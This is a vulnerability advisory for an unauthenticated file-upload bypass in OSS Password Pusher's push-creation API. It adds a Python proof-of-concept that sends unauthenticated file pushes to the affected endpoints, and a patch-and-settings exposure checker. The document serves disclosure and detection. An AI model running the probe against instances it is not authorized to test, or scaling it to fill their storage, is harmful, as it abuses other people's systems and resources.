OSS Password Pusher Authentication Bypass Vulnerability in File Upload Feature
Vulnerability
A vulnerability in OSS Password Pusher versions prior to 1.69.4 (1.x release line) and 2.4.2 (2.x release line) allows unauthenticated users to create file-type pushes through the generic JSON push-creation API. On instances configured to permit anonymous push creation, the generic endpoints accepted a 'files' parameter without applying the authentication that file uploads are intended to require. As a result, anyone able to reach the API could create file pushes and consume storage and bandwidth on the instance.
Impact
Exploitation of this vulnerability allows unauthorized creation of file pushes. The direct effect is resource consumption: each push stores the uploaded files and serves them on retrieval, so an attacker can fill storage and consume bandwidth without holding an account.
Reproduction
The vulnerability can be reproduced against an instance on which 'allow_anonymous' is set to true and file pushes are enabled: send an unauthenticated create request (POST) to the '/p.json' or '/api/v2/pushes' endpoint with the 'files' parameter included. On an affected version the file push is created without any API credentials.
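As an added example (not code from the advisory or from the Password Pusher project), the following Python script sends the unauthenticated create request described above to both generic endpoints and classifies the responses. The Rails-style nested parameter name password[files][], the hostname pwpush.example and the response shape it expects are assumptions; the advisory only names a 'files' parameter. Run it only against instances you are authorized to test.

```python
"""Probe for unauthenticated file-push creation on a Password Pusher instance.

Added example, not part of the advisory or the pwpush project. Assumptions:
  * the generic create endpoints are /p.json and /api/v2/pushes (from the advisory);
  * push params use the Rails nested style password[...]; the file parameter
    name password[files][] is assumed, the advisory only mentions 'files';
  * a 2xx whose body is a JSON object means the server created the push.
"""
import json
import urllib.error
import urllib.request
import uuid

# Generic create endpoints named in the advisory.
ENDPOINTS = ("/p.json", "/api/v2/pushes")


def build_multipart(fields, files, boundary=None):
    """Encode `fields` ([(name, value)]) and `files` ([(name, filename, bytes)])
    as a multipart/form-data body. Returns (content_type_header_value, body)."""
    boundary = boundary or uuid.uuid4().hex
    parts = []
    for name, value in fields:
        parts += [f"--{boundary}".encode(),
                  f'Content-Disposition: form-data; name="{name}"'.encode(),
                  b"",
                  str(value).encode()]
    for name, filename, data in files:
        parts += [f"--{boundary}".encode(),
                  f'Content-Disposition: form-data; name="{name}"; filename="{filename}"'.encode(),
                  b"Content-Type: application/octet-stream",
                  b"",
                  data]
    parts += [f"--{boundary}--".encode(), b""]
    return f"multipart/form-data; boundary={boundary}", b"\r\n".join(parts)


def build_probe_request(base_url, endpoint="/p.json"):
    """Build the unauthenticated create request with a tiny constructed file."""
    ctype, body = build_multipart(
        fields=[("password[payload]", "authz-probe"),
                ("password[expire_after_days]", "1"),
                ("password[expire_after_views]", "1")],
        files=[("password[files][]", "probe.txt", b"authz probe - safe to delete\n")],
    )
    req = urllib.request.Request(base_url.rstrip("/") + endpoint, data=body, method="POST")
    req.add_header("Content-Type", ctype)
    req.add_header("Accept", "application/json")
    # No API credentials on purpose: the question is whether the server insists on them.
    return req


def classify(status, body=b""):
    """Turn an HTTP result into a verdict. Only a 2xx carrying a JSON object
    (the created push) counts as 'vulnerable'; an HTML page after a redirect
    to a login form would be a 2xx too, so the body check matters."""
    if 200 <= status < 300:
        try:
            payload = json.loads(body or b"{}")
        except ValueError:
            payload = None
        return "vulnerable" if isinstance(payload, dict) else "created-unrecognised-body"
    if status in (401, 403):
        return "rejected"
    if status == 422:
        return "rejected-by-validation"  # e.g. file pushes not enabled on this instance
    return f"unexpected-{status}"


def probe(base_url, endpoint="/p.json", opener=None):
    """Send the probe to one endpoint and return (status, verdict). `opener`
    lets callers inject an OpenerDirector-like transport; default is real HTTP."""
    opener = opener or urllib.request.build_opener()
    req = build_probe_request(base_url, endpoint)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, classify(resp.status, resp.read())
    except urllib.error.HTTPError as err:
        return err.code, classify(err.code, err.read())


def check_instance(base_url, opener=None):
    """Probe every generic create endpoint; the instance is affected if any one
    of them accepts the file push without credentials."""
    results = {ep: probe(base_url, ep, opener) for ep in ENDPOINTS}
    return {"endpoints": results,
            "affected": any(verdict == "vulnerable" for _, verdict in results.values())}


if __name__ == "__main__":
    import sys
    report = check_instance(sys.argv[1] if len(sys.argv) > 1 else "https://pwpush.example")
    for ep, (status, verdict) in report["endpoints"].items():
        print(f"{ep}: HTTP {status} -> {verdict}")
    print("AFFECTED" if report["affected"] else "not affected")
```

A patched instance, or one with anonymous creation turned off, should answer both endpoints with 401 or 403 ("rejected"). Remember to delete any push the probe does create on an affected instance; the short expiry values in the request limit how long it lingers otherwise.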
Remediation
Users are advised to upgrade to Password Pusher 1.69.4 or 2.4.2, whichever matches the deployed release line; both releases contain the fix. If an immediate upgrade is not possible: set 'allow_anonymous' to false; restrict or disable file push capability; block untrusted API create traffic at the edge; and monitor for unusual unauthenticated create activity.
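The two fixed versions sit on separate release lines, so a single "greater than" check gets the answer wrong for 2.0.0 through 2.4.1. As an added example (not code from the advisory or the Password Pusher project), the helper below decides whether a deployment is patched, mitigated by one of the interim settings, or exposed. The PWP__ environment-variable prefix, the 'enable_file_pushes' key name, and the defaults for both settings are assumptions; the advisory only names 'allow_anonymous' and the fixed versions.

```python
"""Decide whether a Password Pusher deployment is exposed to the file-push bypass.

Added example, not from the advisory or the pwpush project. Assumptions:
  * fixed releases are 1.69.4 on the 1.x line and 2.4.2 on the 2.x line (advisory);
  * settings are a dict mirroring settings.yml keys; 'allow_anonymous' comes
    from the advisory, 'enable_file_pushes' is an assumed key name;
  * environment variables prefixed PWP__ override the file (assumed precedence);
  * assumed defaults: allow_anonymous true, enable_file_pushes false.
"""
import re

# Fixed release per release line, as stated in the advisory.
FIXED = {1: (1, 69, 4), 2: (2, 4, 2)}

ENV_PREFIX = "PWP__"                         # assumed override prefix
FALSEY = {"false", "0", "no", "off", ""}     # accepted spellings of "off"


def parse_version(text):
    """'v2.4.1', '2.4.1' or '2.4.1-rc1' -> (2, 4, 1); anything else is an error."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)(?:[-+].*)?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part) for part in m.groups())


def is_patched(version):
    """True if `version` carries the fix for its own release line. 2.0.0 is
    newer than 1.69.4 yet still vulnerable, which is why one threshold is wrong."""
    v = parse_version(version)
    if v[0] > 2:
        return True                              # newer than both fixed releases
    threshold = FIXED[1] if v[0] <= 1 else FIXED[2]
    return v >= threshold


def effective_settings(file_settings, environ):
    """Merge settings.yml values with PWP__ environment overrides; environment
    wins (assumed). String values are normalised to booleans."""
    merged = dict(file_settings)
    for key in ("allow_anonymous", "enable_file_pushes"):
        raw = environ.get(ENV_PREFIX + key.upper())
        if raw is not None:
            merged[key] = raw.strip().lower() not in FALSEY
    return merged


def exposure(version, settings):
    """Return (state, reason) with state one of 'patched', 'mitigated', 'exposed'."""
    if is_patched(version):
        return "patched", f"{version} includes the fix"
    if not settings.get("allow_anonymous", True):
        return "mitigated", "anonymous push creation is disabled"
    if not settings.get("enable_file_pushes", False):
        return "mitigated", "file pushes are not enabled"
    return "exposed", "vulnerable version with anonymous file pushes enabled"


if __name__ == "__main__":
    # Constructed sample deployment: vulnerable 2.x build, anonymous creation
    # switched off through the environment.
    settings = effective_settings(
        {"allow_anonymous": True, "enable_file_pushes": True},
        {"PWP__ALLOW_ANONYMOUS": "false"},
    )
    print(exposure("2.4.1", settings))
```

The version gate alone is the part most worth lifting into an inventory script: it takes the release line from the major number and compares against that line's own fixed version, so 1.70.0 and 2.10.0 read as patched while 2.3.0 does not.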
